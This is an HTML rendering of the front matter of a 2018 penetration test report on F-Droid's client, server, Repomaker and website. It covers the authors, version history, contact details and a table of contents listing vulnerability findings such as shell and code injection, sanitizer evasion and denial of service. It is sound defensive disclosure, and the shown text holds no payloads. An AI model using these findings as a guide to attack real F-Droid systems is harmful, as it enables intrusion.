Second_Audit_Report.html
---
layout: page
title: Second Audit Report
---
<br><div valign="top"><div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Client</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Open Tech Fund</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Title</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Penetration Test Report</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Targets</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>F-droid Client</div><div>F-droid Privileged Extension</div><div>F-droid Repomaker</div><div>F-droid Server</div><div>F-droid Website</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; 
padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Pentesters</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Authors</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span>, <span>Patricia Piolon</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Reviewed by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>John Sinteur</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Approved by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; 
padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Version control</div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Date</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Author</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.1</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>March 2nd, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Initial draft - python code audit targets</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; 
padding-bottom: 3pt;" valign="top"><div> 0.2</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>April 16th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Final draft for review after adding all issues from code audit and pen-test</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.3</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cleaned up xml, fixed some errors</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; 
padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Finalizing</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Contact</div><div style="margin-bottom: 5pt; line-height: 6mm; margin-left: 0;">For more information about this
document and its contents please contact Radically Open Security B.V.</div><div><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody style="border-color: #444444; border-width: 1pt; border-style: solid;"><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Name</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Address</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Overdiemerweg 28</div><div>1111 PP Diemen</div><div>The Netherlands</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Phone</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>+31 (0)20 2621 255</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Email</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>[email 
protected]</div></td></tr></tbody></table></div><div style="font-size: 9pt; text-align: center; margin-top: 15px; color: #999999;">Radically Open Security B.V. is registered at the trade register
of the Dutch chamber of commerce under number 60628081.
</div><div style="color: #e2632a; font-family: Helvetica; font-size: 18pt; margin-bottom: 0.7cm;">Table of Contents</div><div><div><table valign="top"><tbody>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary">Executive Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction"><span>1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction">Introduction</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#introduction"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope"><span>1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope">Scope of work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scope"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives"><span>1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives">Project objectives</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#objectives"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; 
margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline"><span>1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline">Timeline</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#timeline"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell"><span>1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell">Results In A Nutshell</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#resultsinanutshell"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary"><span>1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary">Summary of Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findingSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary"><span>1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary">Summary of Recommendations</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#recommendationSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#dataSummary"><span>1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#dataSummary">Charts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#dataSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie"><span>1.8.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie">Findings by Threat Level</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#threatlevelpie"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie"><span>1.8.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie">Findings by Type</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#typepie"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology">Methodology</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning"><span>2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning">Planning</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#planning"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification"><span>2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification">Risk Classification</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#riskClassification"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon">Automated Code Scans</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans"><span>3.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans">Automated Scan Tools</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scans"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary">Pentest Technical Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings"><span>4.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings">Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findings"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>4.1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker">OTF-001 — Evasion of Bleach Sanitizer in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>4.1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver">OTF-002 — 
Shell Code Injection Via Malicious Appids Into Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>4.1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing">OTF-003 — Code Injection in Fdroidserver Metadata Yaml Parsing</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>4.1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py">OTF-004 — Infoleak in Fdroidserver Checkupdates.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>4.1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data">OTF-005 — Code Injection in Fdroidserver 
Checkupdates Through Eval'ed User Supplied Data</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>4.1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py">OTF-006 — Code Injection Via Malicious Appid in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>4.1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py">OTF-007 — Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>4.1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 
1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response">OTF-008 — Unvalidated User Input Included in Response</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage"><span>4.1.9</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage">OTF-009 — Application uses TrustOnFirstUse (TOFU) Usage unverified signing certificate</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f39-trustonfirstuse-tofu-usage"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>4.1.10</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites">OTF-010 — (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a 
href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>4.1.11</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py">OTF-011 — Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>4.1.12</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver">OTF-012 — Key Alias Collisions Can Lead to DoS of Publishing in Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>4.1.13</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py">OTF-013 — Image Bomb Can Lead to DoS in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>•</span></a></div></td></tr><tr><td 
style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>4.1.14</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py">OTF-014 — Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>4.1.15</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver">OTF-015 — Parsing Untrusted XML Data in Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>4.1.16</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified">OTF-016 — Missing file type and size validation </a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>•</span></a></div></td></tr><tr><td 
style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>4.1.17</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection">OTF-017 — Use of Insecure Communication Mechanism - BluetoothClient.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>4.1.18</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection">OTF-018 — Use of Insecure Communication Mechanism - BluetoothServer.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a 